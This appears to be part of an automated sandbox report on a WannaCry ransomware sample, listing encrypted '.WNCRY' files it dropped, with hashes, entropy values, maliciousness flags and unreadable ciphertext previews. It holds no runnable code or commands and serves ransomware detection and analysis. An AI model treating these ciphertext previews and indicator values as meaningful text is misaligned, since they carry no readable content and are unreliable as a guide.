                                                  Preview:WANACRY!.......`iy._..'..-...Md....(.<..'..FG ....R.@....K>..%...(.qC...l....w..............7..7T`.....y. ..39.A."....r..{...~....I....z....m,.<..~l'.7..G.s..I.a...."..wv.7.G.7D.'he....#.!.:.!.....^..5../.-6n.+W..A..[..5..*.r.2e.Z.h.@......v..4.O}.=......t....+>.......K...?.ut.r..xC..vP*V.........N...G...).&.......a...".g+...o6.`!k..9/....p.O8...I[ ..5V.O..-T....*...xS.....X.X2,.W...T.x.;A..Q@...1.*/....~.....kT.}.G..H)L.j.........>.._J ...Y...C+....0..cC.L;..$..5..v.tO.,O.."?..W. ....e..7+.f"!E..\.Bq.e..`g.E$..sK0#..k....=....H.VW...>8<..Z(..lc-&....>..ld....#..xT...&..{...c..0...:.=.....~.A...Ay.yf..... .$.O.G.di1XF..HN..;$7b?z6N....*jK....... .....I..........wJ%F..m,.<r4..5uG...o...B..@{G..Mb.y...m....s...>H3B...5..^...VQ.>....|f..N.C.....x.....s.u0..Z..Yj.G.s.q.G..V.4e*D.2ig.......d.j../!.x...:.....b..._.U...F(.B..Y;.k.4....K.{.~-..bjP..R..."f....+...{Cw.5p...S.X..P.2.01.h.6v.......I1.. wi.9x....:.4YFg[...~pX.D.%.cOE....=.....j..._.W.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):49160
                                                  Entropy (8bit):7.9951834510139355
                                                  Encrypted:true
                                                  SSDEEP:1536:PVJz1yd1b+qeqssHmYuILxWW7aYP1vv6nhQPd:dJZXqeaHnJEW7tlvWhQPd
                                                  MD5:36CFFC1BA5BEF4B218FA9E96B35B610B
                                                  SHA1:D3C5F2D3C5DD614F05B7B866BCBB9E2BE1E21BC2
                                                  SHA-256:0CC2CA9ECC7CC786830BAE088F8E5E57BA869D27F4F9B4CA6866A2C7D94DB537
                                                  SHA-512:B4B4D0B4A9C8F0DF2299FAF1E36577DAB2A5EFDEE1184CDD41A8D434EA44D6E481404508D370AF0951E51D20ABD60AAB49826C4495E9FB65C846C721426F466E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....T..d.:_Q-cUfw../..>....",.h.V...9......W..i-..L.j...BSE.9....Sjr<C._t..._!...1G........*..."9a.. ..d.4a%....B....m.a..u...o.a....%.)..k ...v1o....l..\L..`e....B.C.c_.'.;..J[-.Pf|.}...B..s..1.1-@1....v.. ...g9c_.7E..5..../&@.ct.@....};L.&...MR8............V.C.CR.~.su{kT...W8>.V2Z8.9Wb..C.O|..7S*P."v;4..\..t.7.G.0I.d1...r.i.6_.\....<6R}.L....k..bgyY...1...8.d..94.@F....b_<Y.....0..Z..L..W..C.Cm..C]W..............s.+..X..'..GRJ....d;1T..P.\.,RI. ~..n/.......Ynu.Y........#...&>Y.#y(V@1.v..D<q.1.....)..#5..e.T..W.DY.C...0e..<0.A8..Q_....$CW)..B'..Dv&n._:P...q&5c.. .X.$@.:..Ks8....nw...k?aG..,.......L$.b..6U-c....K[.X..W.J{.$.$Yg....@.{.5..).}q...=B.....E.....H.......H...........K...]M...../K.y M..Q..ZkDfH.e|..z.....1{...Y.cL...n..$0%.7...u.8.,....yw..>.$..u%.@^p.E<.k...'....~.1...... ..}...[....j.A}...oz...>...vpt.9J+\.Y..]........I.k.....l..oNV..{E,.cOr..g.........^...M...o...P...<..R..-5.d......%.C..q.t........3.<..f.ZS.2.k.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):40328
                                                  Entropy (8bit):7.995794522066687
                                                  Encrypted:true
                                                  SSDEEP:768:DtVAfECIgto74W4Vi4cQgXKhMI65AnoKEGrmWWYKYz4M1u:DtqfEQa4/rcfXKeI65AoKtrKYLu
                                                  MD5:590CFA19229BE32C566105A52E194C1C
                                                  SHA1:2F330A1DD40191DBDE9A077B8E6093EF3EA1A6DE
                                                  SHA-256:611E3552B4E5486199BA278B489C6AEDAFEA77DBE0F08C47786E13F27BC9DBCC
                                                  SHA-512:BCFA30EA86DA24763C1813A6B6591D74D956D8060AF7C5D25C798E29A98EB5358E1D65EB1930639DA340338A82158C133A6D823BEC4FB9E2C979AE5AF11DA9F1
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........GT.o.zB...d.....Jk.6....K..>Y..n+.2.2b.\1L6.....EbG..rFOq&..`...r."'i.%4-....uo....~1...g.:-..z3>.0.J...../..$.+h.p..}t.....&....!J.I.6{.c...f.....1:.\n~[....^..w...A..W(....?........>.....r./+-*..3.|..O..Dy.QQ.D..5)e.0.W.K^x..tL..|..5....n...............xC.....#1...v...*z.L.....3].Y.....Duf.;.......r{.~....+......C...U|Dx..e..Y{....S.k..Te...Q....<b...V.Dk...9i..H...[..^.Ha4..L....|o......v.=1.~5...3.7c.m...n.s..D.>X.Uu.b.[..W.....ihv.....q..jo..'F.<e....4.v._....A.=.Q.@]..@.t.W#W...E8`.L.5d...IS..t......`U.x.Z.K..5H|H..s}.YY.OKH8.e....R...N.....M..................zZ.L.....3.....@1......&j.d...n.l..K.^UG.N..#....L....Yt/.o...-.R.iK.@....x.."....c|....o.P)U.$.P..6.co+..K...+.h......b....i|.........M..7.......".962.LR9.....Z6......fF,....@Z.l......h6h..Z6...(...fu..`..%.b.)\..A..S...S}..Wpt,e.K..\.x@<..;&b\.....4..y(...I.W..}a...6.....Z..g..KvC....,A...aY.u.r.LlC..[.._..h...Y$&bW..;. v^.....2.e.\;QE5)&X...uj

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):799560
                                                  Entropy (8bit):7.999801322075106
                                                  Encrypted:true
                                                  SSDEEP:12288:JCaUrqLcca5VSKcOO20LcZbd9/S4/MEcjsqowTx5cVS7Vr9P9bGCASL6:rUtcQTcOOFwZb//S4/MrT/xGV+XRbASu
                                                  MD5:ACE645234868B92684209AC53177A003
                                                  SHA1:62923A3B814AC1CC2EF8EC1A0374AD921A6F3C66
                                                  SHA-256:3E55A89F97C7E75FBEF61CF7A3720F04213A2FBA21DC06CAA0C495A59898DDFF
                                                  SHA-512:E7B583DAF128B195911C7EB443007300839D696C1205E0597CD07F0BDFB1816834BDB92A91B6A9D711C5DA72D70EA213671DAFD0887531167A2943C019524224
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......'.......P..M.[..X.gY.V..&1...b...am.w..$....@..;..+.......e...Y..$>.x&H.x...n.[..............p.`.#.||...z.qw...\..$.\.`. ..S.....?...o!L[...|..I.~~.9.(.s}..}.....'F.=...i.6`A....(W.Z.H....<_@d..yj&.h..9.w..UU&..].:...;mr.I.hiD..A..V......./2.......... ...#..C..r..b.P..J<....(;L8..d.......z..DQ.....|.K..;.....0.q.X.%..2..%G.O/..@f..W.k.n...iZ.>"..U.9.h.'.r.+.@.0.....x;.q...-..6..2......ll.......iqG..dG.._JD.[>."..c-........$.F.6].#.z....F.&I!.~0S.....g...@.<9.>.wN..P..e,r..f/.k~.A....\A{s......t..e.q.(8.h74......77.C.....i.7@.l..r...{p...]5.ak....u...g.\....R..U..{P.....`...1.|..v...@......l.}o..._.\.Es......v}...:.:-....W....h.=...2'V..T.....D...sL.......X..8k.g*..5.y.D^.+.!LH.........u.X.{ {==i.8.D..P.2 .)....]6>..,0.i..M../..........`.e.h.I'..w.C.e..H4....}...2d.v.E.'..7.O..H..d.G.....U...dr..............J.'.......(.8L..\.(9nuk.KAO ..,.........)D.v.d.._y..M..(@..(G.[%....C.....J....#-..F...V._.....[nG.V..t.E..

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):89144
                                                  Entropy (8bit):7.9979869212743875
                                                  Encrypted:true
                                                  SSDEEP:1536:kzI01h6SLVlIYEiE1yupmR0pBedYLLoLPpUJ08usXDZ+hWkApFl/1GVn2:k51h6Ilte4MqcBedsMVb8u2DZ+hYl/1t
                                                  MD5:D2FCB7E7B5E31F2CE7F28255BD674277
                                                  SHA1:E97B478E324B0F595409B0F0C24407FFC039D58F
                                                  SHA-256:4CB6E2A811157C2F7C4124FD796156A622D9D8CF468D144D447A7DA588317593
                                                  SHA-512:223658B44F57337848417140C5B1EB92B53AF6FF4078ADAEACD54FC2A2D1C16F14FFF1248E723AB37FA02066FE94C0ACC8280C1400B62D0694C3E7F2A335C7F2
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....p>F......_.V:...&.f......61....s..}.. ...2....L.L....^.?..0^,.z......A.Kl..[\'.&VKmA..k..i..!.=....B...Y.2.y...@.J....,.<.+A[..8...V...Q.2........k.P..w.;u.........0Nv-6...X....E......L(..O......<...f4.DNlK&...Nm'k.F(-7.m..<c_L.....8.|V.... [.......e6..dO.i..C.Z..lJ.6lOt.5.E.%.....i\..+.,}P..<..h..g....yx.3.?...5...s...N(.b".a...f..._V...fkP..y..M=.&0..PPw.oN[.!..X...#.3..E(f.= ....O..l...\...;U.YkE.#bN).*....a.....u....|..&....1.Q.@.x...`..D.PL......C..@0v]G...dh#.M..*.X+(...6a.>..Gl...y.....pr.......D..f..$.d.KM.j.....:.......Wc..j.H#.:b.%&@....hF..&.....u?.....!...k...s...G......8@.Y.[......$....y.a... .`/....2..m+.gS.W...l....k..P.@..Z.}...>..,..]..b.Z^..|....w>.r.z.C/.ll05N..f..f...;N....A..*......u..t..u.O.`.h..:#..T,.V";.'{.Sgn:.../..H........P.../.&.N..w.....x....T..%.E........_....n<0(.L." #.R{..bUA...W{(....eG..k^.....w.ci...4..~..`K....f.(@.<... .DW.)..R.:...0.;r.......L~...N.&......`r..........t...U!...T2j

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):186072
                                                  Entropy (8bit):7.999028499215018
                                                  Encrypted:true
                                                  SSDEEP:3072:lZLkRjE7WsqJjRg3HiB5QnLX2/TkbHKz8E9WiNSoura+YRd8m/frWeepXT:PkRI7bG22uLb2BI6S9u+YvZjWvpj
                                                  MD5:E8DCF4B5B4F70219BF61495B5CAC1A17
                                                  SHA1:307A7F5585E3CE6555743FF98E2FC460405A4B73
                                                  SHA-256:4F386E5DB4608C5DF292B2AFD989D289A6FA01CFC1F2E63FCA499FFC5047E7F6
                                                  SHA-512:0E484EFCA400AFEB3562C9328A881D214A88B749951622B586969C65B4F2B6B0CAE8B203C9494712653581883B0E5FC5CAAA4D5A1E4579A01DFABC93C83EE26D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....C....%..$b.......".....l.I>.V.z.;..gl.|.0n.QU.......$..(..v....[.Bu*...I.U.#....D....i..p.....w........2h.q..)..Q.......A......F4..0.Pw..k....A....j...j.t......I....2ix...YY..T....&..u..w....H...~....ns7..>Y.(EO.......,.....wz/.fe.=..F.p..3g..................F.?j).sA.cR#..H...x..q..i.pt...r.....T`..}.=.....Ngx.C.u.z.b.........d...G..........0....../)....#.`.g..... ."*...J..o...U2.:U.. .>.x.\vD.C.....`...W.....6.d-l.Vr..X...o.m]/J_0^#.l.+}.k3.rSv.H MV..4.y.(...Z..J.0....p.:7*4R}.(U.d..O..8...%....8A.i..e...p.....|q6......_~.&.n.%%.E.....'..w.....&hpY.E...f/Yvbl..+............. .D%......k.v..lK$...g. .raWF... ../y.!....H$.J..C..B...2...t.......Y......<..R.....&.z".......|t..N..zJ...O[.!....N.om...c..$L*8.^(...Ax..&...E.Z.............e..*..t....os...;.w&#[C.5..(A...:K..1.}&l.t;.W.e..H......-<....^jA..db....`,.nL.x.p..%......T,...!S..JoK.W%W..^z.#1...f..H.....jN..j...0.a+.....O3..~....X#f.S4.l1...)....i..9......&lT...i3.Iw....c%.p

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_29[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):17736
                                                  Entropy (8bit):7.990090811555969
                                                  Encrypted:true
                                                  SSDEEP:384:JZ4SHU1x8fVuZJBZQO4V7lCBKe+Dv8M+VOfKNgthQQnMwoovQaZIPqUf:cCwmNuZHZQLV7UKjDv8M+VOSNgtKhaZw
                                                  MD5:19D40551A46E9ACC2E89E3347C5B3D33
                                                  SHA1:2BF67FEB52EC6515D1106D976FA92EF4917C93AB
                                                  SHA-256:7C7DCEA700096ED1074AC023A30B97407114A5885A476DCD2E43E1817899828F
                                                  SHA-512:8E6E51D72EF29F5CD97625888864D56C4129502956BC9BD5CC28BD8388A3AFCDD168650B6D621C17BA9904DC864C31FFC60538539145EABEA49952257283A146
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....j=.......Ry.gt...x....f..O....P....f(......W.".v._!...d.....$r|....}.6.^..N8.@"(9.Rt...R.l..4a?`.3T,9...)...k...^....41..l...p.y.z.......J.8}..)?.{..%*.../..IV@....F......*....>Rso.)....i.b.!.[Q....MC.b.i....#.S%O...!..kS..)).h...+..@.].zR.D.....(D.......x..x+.M.>.2&W......}..1V.O.x.!.s.N.J....W..&....&.~l.v...<..g<...z......[..z.P9i....!.i.1|m.@kK^.4..K"./.`....x.>..<..:..^z.i.....E.T...7...T..{.E.....+..7)@..Yi`.DjBl.....p..Kev....<a...q.,....'._.o.A........J.<F...#.P..5....U..BMg..I..2..FXj.qV.......8..fj9....(+..Q<8.?}.+...I5..#...0hv.......sp!.T.<x>..!x....... wNZ.D....t..).u.^....?....$\.DU./..../....%y...(..6..g.............W ..b..T....... R...94.".."b..&..`....vi.ubE....D...*..X.*.].X......m.b...._HUu'$.T9...............'...L.{..#r.R...{a?CG...l<G..o.g.j.y..{.wV.;4R....R:...,.|..V..5..K.d...z.*....Z.B.&.. ...,.......z.&^....m...lwC....a.......<.f.*.Dvg.f...hak()........2%..F..|/q,t.K.B..h.=F.2.).z5.=`.3/).b.....y......

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):73912
                                                  Entropy (8bit):7.997634603993111
                                                  Encrypted:true
                                                  SSDEEP:1536:YZmu5Z1oFfSml7elrtVelsBl2qqwdUlZ8wysjXB:YZmu5Dgl7uuCf2Bhywx
                                                  MD5:325F6DFDD80291D7504E1E5326631282
                                                  SHA1:993ADD0C459A6EFD8AA9996534539B6A92551536
                                                  SHA-256:916FEFC7EA16850150658C558C256BFC0B99EACAEB5FC43FC04F2B5B8E7AB452
                                                  SHA-512:A18FF0F88FECE018C0ECD5E3E3205BA79C19E8092002955428F04EA860A228083FFCECB1FBA46FA5CA7D262083103966564F3A19CF7015774C16C9B070064540
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......2H...x..O......:.Y..Z7..{..U..F.....|<A..c....NG.:.o&...[UN..O..n ...W.g.....#U?....{.i....F.#Q.x._...u.W..%.z.9...T...6.K7A.`.57./v.....n%...\...)C...w.P.k=..]....zvQ.._...0N.Z..}*c,|S....Ma.iG..9.m..yz........E.o...#.E...;..v....6.....i..`................4s[.t..6;..ON...}.i.....S..jE...P.}..7<#e..O..j~...?.'..._6.L...~..s..Z....5.......A3p..r[..`_v8n.j.............4....fg.($..5v.y&..sb..D....w.......N.2.n..d.U.K...........c0..x.D.t...Ba.7.`$l!....1.1.@yf.%.`zj..fj.....#..T.v....O..b....\O.~t}...S.'.G..&Y5..&[...d...&......#...{.z6...q.UHi.mX\.'H.O.*[.^.~..3....I...>D.....:..U.E.;.p.....K.t.kL.......)..S.L..i...2.oCR.ORbu.....<.@...1..-...I.....{O....g.u..y..~.D..4.....^..J1.D....K..NZ.[...>..Q...?...P...rtA....+.R.a.j.c....y1.$.....9d...;.. ....rI{=b......`..].5....r_./...<7q.o=a.@.'..e'.....J.....}..h4.].e.....8ZQ.#.p.}......T....z....JP.L...4.q.....r.e.........R..K.......~O.$....!..c.D.<W...A.@.a..{L).5n..P.i34....Sn...c

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_3[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):19336
                                                  Entropy (8bit):7.989214822925728
                                                  Encrypted:false
                                                  SSDEEP:384:SFg+iG6GVRNzKwrhMJMckmIz418YZAxIJnnNfpvXpGSsSLxVk5:SFn6mrjfckmxv+xIln59XpGxSVVm
                                                  MD5:9EC19256A9E8224DC0F10EEEF316451C
                                                  SHA1:FCF0A5EB2ED33E544CD75E9C060A3A9CD0E91D63
                                                  SHA-256:CA7567E19F6151353CBB1E357FB5E4B15A46C84CA9BEED4CD6DAB4EBDE422D2A
                                                  SHA-512:A999300111B573461CF891E3E07E7E49A9BB028CC25380E72EA2F63A6115F723996BBD750A23DAD99E7F9034BA0FF3856BD6575D596B77401BCAD436551283DF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....p...........eh.q..x........(7.]...)B%...5J1.........0..i`4...=... ..5k?.[_.lT#....~t.j.8....-no."..J.....C.A.Rq$$..[...c..t..+.".{...Bw.l..GJ4..W`.c.D.O.rQ.;.5=...n.Vp....H..m,.Fi..J~.t....JtT.\...!A...>l.......@v..p.q...\.........7.#h..G.%8..'.V>....pJ......E6w.;.....>.....U.2.bxD.O...h.G..`..M.l........k,.Dt..M|.7...._.+.*..TI.!....}{[...qA.r>b...M..-6..f.$O.y=M!R.f...7..T......7U.........1.S.f.BA..S~.%.s2.c.Q.S95I_.x...t7m.(`.........2./.bM...(..D.......{-4jI...&-5.S..d..4w....,.'\...-%...x...eAh...N"Eo.......$lG;...f..6Eu....L..N....3$..g...v.z...7.......=\...#...o......y3..v;/g.7.f.Y.*..GJ...j....V..z....^G..2J....*o.tD.L...v...=.....].-.$? }]./.c...+.f.D...]T.+...In.....P$...GC~!...o..X3.......-XM..,..-.../......8\...s.....ys.<c_8..^t|.....V=.*@n....*.<.N..4R.....-.`.K.L..yq.Lr.?.X....a....q..h@.>.w.bh..\Y.(.x..Tg1e....>..(....d.!U(........<..EH..y1.4..."..c....6.Y&....d.E.....W0,.^....tL!......^../O....^.[.............#.

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20680
                                                  Entropy (8bit):7.990892039491002
                                                  Encrypted:true
                                                  SSDEEP:384:CqbA+pTJolp3R8/pmZt0ylH8pzh1ktVSGJ3dP6DBBKX2YGFnPFo8T/D:CYPk1RAmZvcnatVSuKXdF9jD
                                                  MD5:5A1CF04A16C3433E66D9B2B059C49277
                                                  SHA1:D74925C1EA6E87ACCF5CEBEE30D4D17E2AFA0129
                                                  SHA-256:FE8AF96F61EA775F1B2FB34E49B58F1AF7C920A0391FEBA2244ACA88B36AAF5C
                                                  SHA-512:5E604BF3E0F0A5AF271A1FF6AC0892E10CBAB476252C248D10BF949DA95E9B0BA4F477660FB8DA0F163028E17DF832614D1AFEB9B68D9112272A04CAABDF9197
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......SB,.p..~...y.N{.7.w..%.....t.x..0...o...Z.c...w)#.....,R.M.~..WC..../d...K'.=.Z.N.h.\....d...*=..`.]y...gA...*..f.....H..d....t!.fbi...F3&h.%....%|D1...u....P....... ...]a.|OD..#.c.b.V..94..h..@.=...~...J..,.m./..Zg..DH.y`@<*..7.q..w..&V....9......O......._x.p.*...Yy........|...5.1(1....DS.o8J-....=......]H.U#....Fm.*...+....n.o..Fu.x..X..@)...I..".Z8..O.....4x7...t2...%......?.b..}......N...p.......).BTG.O.....`@,..9.6W.C..B.f.6..p..N..u.{K6....eK<.5S.\.....ac|....6..X9.....n7..._-....;.r.'.Y.!u..N..J....X`}.-i.[..]..ac.%Gh.`<q....v.(.%....}...<....9~.....gOu..~{.p.=3Fo.f.$I}........=.{..3..0/.#O.F.......z...M.Xc.....J|.Xl..3.B1|t1.">.,.F/^I..)...)>Hw=..gS.E.(.n.!.@...T#.).Gk.Q.i...&.o...."&$..K..u.q{.....n...5.h.u^.V.p.m.).Ah,.%....r8..%.t|.......o....?W.ld.'>y...E..'.....n.1.-.'...8.p..>H..w.x}.H...\..7T.!.......5.j.`...^.../...1...E2.cE.r.I...9X..<..:...T.o..~Izl.......oU............6M..&,.1}t..w......f..}...\`..

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_5[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1608
                                                  Entropy (8bit):7.889873012852417
                                                  Encrypted:false
                                                  SSDEEP:24:bkG2IEEKiFGDwxarC4hddYzyR2SOZ4VM5WNlhl4Cbij1qanUOzkq6uUpFF1xX6ei:bkd608x4CcfOy544fXijEduUlLXKFEB6
                                                  MD5:0FA9E78ED5A1254DB8FE32C6A0E71F32
                                                  SHA1:DCF76903C4ECB0BBEA2E17336F1D629EA52DC8FE
                                                  SHA-256:DD8E0649A7D51C1A219D6270099AC945992E8CFF6F88150559D09C7BBF0EEA9D
                                                  SHA-512:53E895445C37C283953680B55E7CF1036A1F122A592DAE01EFFDFC5FA85FEC4B55E3A2B4D322ABC4D2134D58CE8275D4AEE9DD91E9812136FCA1DB465295093B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......[...Bx.R....d..8...~>G...t....K?...D=J~..\.R.........r.u*...vzIr.4.2.%..'y...M..$!.$.![P.T'..x....4I+..C.*q.....}.e.G..8......#.....0.......$.}.....,.:..s. W+...>....(......\...s,j.Wv..m.-.3.~n.!...3....q..;.|..w...5. ...P...T.*...+..k.s.......$........F\.s./..h.]N.......Dg.=.p......9....N`.ua^..mo....pc_.kD...]i.-.....<......v.. ...}.D[...Fx5. ..^2...b.....S*..........I.......x816+....lg4.M.t...8..C.o..2.4(.g.$lE%[.........r:.V..........J/.Z"....Nk...m.9p2....@...s...Zy..rql."...J.....u.R.N..u.R.......L....;...u_....'...1....+.@.`&g.`.QJ~.$... 2......V.........E.MKm.S...c.Rx...@..6k....It.h..m.....b....n...`o...O.....&..\....F.q..f.>/..b..l:.....f.......}..~]....S.r.1......s.x.D.&N.ZD.fP.c`.,..c..Y...j,(..H...^.....1.1i.<*...GV(.....d.5(st......b.YD....O$.X...6,.H<n.5..;_....).C....6,&.R......y..\....-..._|.......I&).ukS.:.'..o..O_..>K....a../V5.....b...hW..1U.^.Pd.d.K~.1z.....:tA%.K....E...X..C@..W?..."....0....

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37464
                                                  Entropy (8bit):7.99534123291725
                                                  Encrypted:true
                                                  SSDEEP:768:pJu+ugR70rvI3aZpfQGzdFIu3mWI8tJF2ALie2hXWOvLeZKnb49IF+M:bu+3xupfQGzdFIEmeF2Aue+vLIg44D
                                                  MD5:575F5877D801483560D58A753B1A2101
                                                  SHA1:47D1A6255C97F1D3F6212C2028843AB06D0E8C3F
                                                  SHA-256:CB93626EAD1791CA5759C0F0FF1C6E1F789EB584137C0317901365A2B1A9E8F2
                                                  SHA-512:EF15A65F5F5CD1C8C1DEF3A698B602F27B94ADA497FF950FC12A489E22743A6CB976099AEF94FDF0A1142093A865DEBC7C3ACEEC37A8D55710E744763CEED892
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......90.".+MG."..7...IA"K.I.!...8......5.U...y.....X.0o.r...Y.\..L..[..$JF...\.JO.E._i...C..i.D......9d..^.S.%..4.^.Yi....Y..M...9......J..D.o#.c.JZ."..XB.I.;~8..2..M|.......W>@../.E..."6x..p......u.w9..mv.2.u|T..y.......J<;.F0...j.e....|..(...Pt...k......=........oi....^.v..q=..@.}...q....nEK....O.R...(6^.pN5p\ .=/.....v.k.~..psa.]zy~......E..,.6b....$.C!.H.$D...'{.2..juC.P........WE....m...:.G......m.`c.......X..U....F.B.K...>....B...!.A.:...%{.)W^.G..3.....JaX.....I.*S....r........].HB..`..@.E.T.J.H`y...S..^.KH...y.a@0..9..2.H..........<..-p.F...=...(6...t.i!c..:*..,*...c...e...(.O.7._~_AuI?./...|.>.`.R.G*. .V.=.1F>S\`.... .6..Rn.'.AV..m..Q...Qmy.<.K..I3.fN5+....Z..`......r.z{.N...?..Tks....F.D\.H9^.X.....+..BUu.hw.r..?.f.@..%.+..[.L.+C....M...).>}.....y......k4G..$B.`.......n.3......,.c....g.B.B.KMmT4.f....6.h...*.^.7._9.x........t..+.y...2~z..._`?.P..z..~....t...;..A...Xz.-.....h...... ..1..z-..a.,......x.nt.......~,.Ap7d...W}

                                                  C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):168968
                                                  Entropy (8bit):7.998861858012997
                                                  Encrypted:true
                                                  SSDEEP:3072:Q5CSHSy96gGE6U1EgSbDWwXqPuwz15YhcBVHWsGUTKM7MzmE:QUSHL62E1b6uqWFhcnW9JM7MiE
                                                  MD5:FA7ECE6E695E467C30FD27BB60DFAB4B
                                                  SHA1:E1D72D012D67058D89D2E5E3E35A2063FCF5C8D5
                                                  SHA-256:BC9E1ED1C2431E88F60FE0FA0F5D3B48DD9DEB512C9F0C5A10E963D2CC2593FA
                                                  SHA-512:285F9E6B364FF63B21E0F6369CF480B7B70C7727E13D112269B8F4FE7510FCEB1FEE7D993A00152052B2249893BDE1EC83BEBACDF01BC91B355769109E7EBB77
                                                  Malicious:true
                                                  Reputation:unknown
